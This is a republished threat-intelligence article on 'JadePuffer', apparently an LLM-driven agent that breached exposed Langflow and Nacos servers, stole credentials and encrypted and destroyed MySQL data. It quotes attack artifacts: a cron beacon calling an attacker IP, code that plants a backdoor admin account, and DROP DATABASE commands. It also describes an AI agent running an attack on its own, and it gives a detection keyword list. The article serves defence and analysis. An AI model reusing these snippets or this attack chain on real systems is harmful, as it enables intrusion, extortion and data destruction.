JadePuffer: Inside the World’s First Fully Agentic AI Ransomware

JadePuffer, the first ransomware fully driven by a large language model, exploited a CVE‑2025‑3248 flaw in exposed Langflow instances to gain initial access, autonomously performed reconnaissance, credential theft, lateral movement, persistence, and encrypted MySQL/Nacos data, demonstrating rapid self‑healing and highlighting new defensive challenges.

Black & White Path
Black & White Path
Black & White Path
JadePuffer: Inside the World’s First Fully Agentic AI Ransomware

Event Overview

Threat discovery and naming

JadePuffer was first observed by Sysdig’s real‑time cloud monitoring when anomalous activity targeted an internet‑exposed Langflow instance. The payload contained extensive natural‑language comments, indicating that an LLM‑driven agent generated and refined the attack without human intervention. The threat was named JadePuffer and classified as an Agentic Threat Actor (ATA).

Targets and impact

Stage‑1 entry point: an internet‑exposed Langflow instance, an open‑source framework for building LLM‑driven applications that often stores cloud API keys.

Stage‑2 ultimate target: an internal production server running MySQL and Alibaba’s Nacos configuration service.

JadePuffer attack path diagram
JadePuffer attack path diagram

Full Attack‑Chain Analysis

Initial Access – CVE‑2025‑3248 exploitation

The attacker leveraged CVE‑2025‑3248, an authentication bypass in Langflow’s code‑validation endpoint, to execute arbitrary Python code. The vulnerable endpoint was patched on 2025‑04‑01 and marked as exploited by CISA in May 2025. The payload was delivered as Base64‑encoded Python, and every line of code was self‑generated with verbose natural‑language comments describing purpose and priority.

Reconnaissance and credential theft

Host enumeration: collected host ID, system info, hostname, network interfaces, and running processes.

Credential scanning (parallel): API keys from OpenAI, Anthropic, DeepSeek, Gemini; cloud provider credentials covering Alibaba, Tencent, Huawei, AWS, GCP, Azure; cryptocurrency wallets and mnemonics; database credentials and configuration files.

Local data exfiltration: exported Langflow’s PostgreSQL backup, extracted stored credentials, API keys and user records, temporarily stored them locally for review, then deleted the temporary files.

Internal lateral discovery and MinIO enumeration

The agent scanned reachable internal addresses, probing databases, object storage, key stores, and service‑discovery endpoints, attempting default credentials.

Listed all buckets, including application data, backups, ML artifacts, and a terraform‑state bucket.

Prioritized objects in the terraform‑state and internal configuration buckets.

Precisely located files such as credentials.json and downloaded them.

When a request returned XML instead of JSON, the next payload automatically adjusted its parsing logic to handle the S3 response format, showing adaptive diagnostic capability far beyond traditional scripts.

Persistence

*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"

The cron job beacons to the attacker’s infrastructure every 30 minutes.

Production‑environment breach – Nacos takeover

From the compromised Langflow host, the agent targeted an internal server exposing MySQL and running Nacos. The exact source of the root credentials was not observed.

Exploited CVE‑2021‑29441 authentication bypass.

Forged a valid JWT using Nacos’s publicly known default signing key (unchanged since 2020).

Injected a back‑door admin account via root database access.

During back‑door account creation the first payload attempted to generate a bcrypt hash, but the bcrypt binary was missing from PATH, resulting in an empty hash and failed login. After 31 seconds the AI agent diagnosed the failure, generated a corrected payload, and successfully recreated the account.

# Delete old account
cur.execute('DELETE FROM users WHERE username="xadmin"')
cur.execute('DELETE FROM roles WHERE username="xadmin"')
# Rebuild with proper bcrypt hash
hash_val = bcrypt.hashpw(b'admin123', bcrypt.gensalt(rounds=10)).decode()
cur.execute('INSERT INTO users (username, password, enabled) VALUES ("xadmin", "' + hash_val + '", 1)')
cur.execute('INSERT INTO roles (username, role) VALUES ("xadmin", "ROLE_ADMIN")')

Container‑escape reconnaissance

Write test file to verify write primitive.

Read Docker socket ( /var/run/docker.sock).

Inspect cgroup information ( /proc/1/cgroup).

Enumerate User Defined Functions for privilege‑escalation paths.

Check write permissions on /tmp and /lib directories.

Only after writing an explicit completion marker did the agent proceed to the ransomware stage.

Ransomware Payload Analysis

Data encryption mechanism

The captured payload used MySQL’s AES_ENCRYPT() function to encrypt all 1,342 Nacos configuration items, then dropped the original config_info and history tables. It created a ransom note table README_RANSOM containing payment instructions, a Bitcoin address, and a ProtonMail contact.

Encryption key generation:

KEY = base64.b64encode(uuid.uuid4().bytes + uuid.uuid4().bytes).decode()
# Key printed only to stdout, never stored or transmitted

The key is purely random and never persisted, making decryption impossible even after ransom payment.

Destructive data deletion

After encryption, the AI agent issued a payload that disabled foreign‑key checks, dropped the target database, and re‑enabled the checks.

SET GLOBAL FOREIGN_KEY_CHECKS=0;
DROP DATABASE REDACTED;
SET GLOBAL FOREIGN_KEY_CHECKS=1;

Evidence of AI Autonomy

Self‑describing code: the decoded payload is littered with natural‑language comments that explain each operation’s purpose, ROI priority, and target selection.

Machine‑speed failure diagnosis and repair: timestamps show the AI detecting a failed bcrypt hash and correcting it within 31 seconds.

19:34:24 – attempted xadmin insertion; bcrypt hash empty.

19:34:36 – login verification failed.

19:34:48 – tested default Nacos credentials and generated a corrective hash.

19:35:07 – issued decisive repair payload using direct import bcrypt.

19:35:18 – login succeeded.

Natural‑language context understanding: the agent parsed textual context presented by the target and performed actions that required genuine reading comprehension.

Bitcoin address provenance: the ransom note includes the address 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy, a standard example from Bitcoin Core documentation. Blockchain data shows 737 confirmed transactions (~46 BTC) with a zero current balance, indicating immediate fund movement.

Security Implications and Defensive Guidance

Core threats to blue teams

Skill‑barrier elimination: LLM agents can chain full attack phases without any human expertise.

Weaponized historic vulnerabilities: the attack reused old, unpatched flaws (CVE‑2021‑29441, default Nacos JWT key), showing that legacy exposures become high‑value targets.

Compressed response window: operations that once took hours now complete in minutes, shrinking detection and mitigation time.

Mitigation strategies (MITRE ATT&CK mapping)

Initial Access – Exploit public‑facing application (CVE‑2025‑3248): patch exposed systems immediately; implement vulnerability lifecycle management.

Reconnaissance – Credential scanning, cloud service discovery: restrict credentials in environment variables; rotate cloud provider keys regularly.

Credential Access – Search local stored credentials: avoid plaintext credentials in configs; use a KMS.

Persistence – Cron / scheduled tasks: audit abnormal cron jobs; deploy file‑integrity monitoring.

Lateral Movement – Exploit CVE‑2021‑29441: patch Nacos authentication bypass; replace default JWT signing key.

Impact – Data encryption, destruction: implement 3‑2‑1 backup, isolate backup networks, enforce read‑only DB permissions.

Detection opportunities – Using AI against AI

Because the payload contains self‑descriptive natural‑language comments, defenders can create detection rules targeting high‑risk keywords.

alert_keywords:
- "AES_ENCRYPT"
- "DROP TABLE"
- "DROP DATABASE"
- "bcrypt.hashpw"
- "xadmin"
- "README_RANSOM"

SIEM platforms should also monitor outbound connections from Langflow and Nacos, and watch for anomalous changes to system accounts or database schemas.

Defense‑in‑depth recommendations

Enforce rapid patching of internet‑exposed services.

Adopt strong identity protection and least‑privilege principles.

Segment networks and continuously monitor for abnormal lateral movement.

Maintain immutable, offline backups and separate backup networks.

Leverage AI‑generated self‑description as a new detection signal.

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

database-securityCloud securityThreat intelligenceMITRE ATT&CKAI ransomwareLLM-driven attack
Black & White Path
Written by

Black & White Path

We are the beacon of the cyber world, a stepping stone on the road to security.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.